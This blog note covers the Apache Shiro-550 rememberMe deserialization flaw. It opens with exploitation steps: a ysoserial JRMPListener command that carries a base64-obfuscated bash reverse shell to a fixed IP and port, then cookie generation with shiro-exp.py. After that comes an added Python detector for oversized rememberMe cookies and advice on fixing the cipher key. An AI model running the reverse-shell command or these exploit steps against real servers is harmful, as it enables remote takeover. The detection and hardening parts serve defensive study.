Shiro Vulnerability Notes

Shiro-550

0x00 Finding the vulnerability


Shiro detected


Login page


0x01 Attempting exploitation

  1. Start a JRMP listener with ysoserial.jar

    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 10998 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc5LjEzOC85OTg4IDA+JjE=}|{base64,-d}|{bash,-i}"

  2. Then generate the cookie

    python shiro-exp.py 192.168.79.1:10998

  3. Start the listener

  4. Set the cookie and send the request

    Exploitation confirmed successful
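From the defender's side, the artifact that the steps above leave on the wire is a rememberMe cookie that is far larger than anything Shiro itself issues: a gadget chain serialized by ysoserial is several kilobytes, while a genuine rememberMe blob (an AES-CBC-encrypted serialized PrincipalCollection with the IV prepended, then base64-encoded) is a few hundred bytes. The following Python detector is an added example written for this page; it is not code from the original post or from the shiro-exp.py tool it mentions. The length threshold, the header-parsing helpers and the sample request are assumptions constructed here for illustration.

```python
import base64
import binascii
from dataclasses import dataclass
from typing import Optional

# Shiro's rememberMe cookie is AES-CBC ciphertext with the 16-byte IV prepended,
# then base64-encoded. A decoded blob must therefore be a multiple of the AES
# block size and longer than one block.
AES_BLOCK = 16

# Assumption (not from the original post): a legitimate rememberMe blob, which
# carries a serialized PrincipalCollection, is a few hundred bytes, whereas a
# ysoserial gadget chain runs to several kilobytes. Tune to your own baseline.
SUSPICIOUS_LEN = 1024


@dataclass
class Finding:
    reason: str
    decoded_len: int


def extract_remember_me(cookie_header: str) -> Optional[str]:
    """Return the rememberMe value from a Cookie header value, or None."""
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == "rememberMe":
            return value.strip().strip('"')
    return None


def assess_remember_me(value: str) -> Optional[Finding]:
    """Flag rememberMe values that do not look like Shiro's own output."""
    if value == "deleteMe":  # Shiro clears the cookie with this literal
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return Finding("rememberMe is not valid base64", 0)
    if len(raw) <= AES_BLOCK or len(raw) % AES_BLOCK != 0:
        return Finding("decoded length is not a plausible AES-CBC blob", len(raw))
    if len(raw) >= SUSPICIOUS_LEN:
        return Finding("oversized rememberMe blob (possible serialized gadget chain)", len(raw))
    return None


def scan_request_headers(raw_headers: str) -> list[Finding]:
    """Scan the header block of one HTTP request for suspicious rememberMe cookies."""
    findings = []
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "cookie":
            cookie = extract_remember_me(value)
            if cookie is not None:
                finding = assess_remember_me(cookie)
                if finding is not None:
                    findings.append(finding)
    return findings


# Constructed samples: a normal-sized blob and an oversized one standing in for
# a gadget-chain payload (filler bytes, not real ciphertext).
BENIGN_COOKIE = base64.b64encode(b"\x11" * 96).decode()
OVERSIZED_COOKIE = base64.b64encode(b"\x22" * 4096).decode()

SAMPLE_REQUEST = (
    "GET /login HTTP/1.1\r\n"
    "Host: app.internal.example\r\n"
    f"Cookie: JSESSIONID=deadbeef; rememberMe={OVERSIZED_COOKIE}\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for f in scan_request_headers(SAMPLE_REQUEST):
        print(f"{f.reason} ({f.decoded_len} bytes)")
```

Run against captured request headers (a WAF log, a reverse-proxy dump or a pcap export), the scanner reports oversized or malformed rememberMe cookies without needing the server's AES key. The size check is a heuristic, so pair it with the real fix: replace Shiro's hard-coded default cipher key with a randomly generated one so that attacker-forged cookies fail to decrypt in the first place.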


Source: https://tsy244.github.io/2024/02/13/整理/Shiro漏洞整理/
Author: August Rosenberg
Posted on February 13, 2024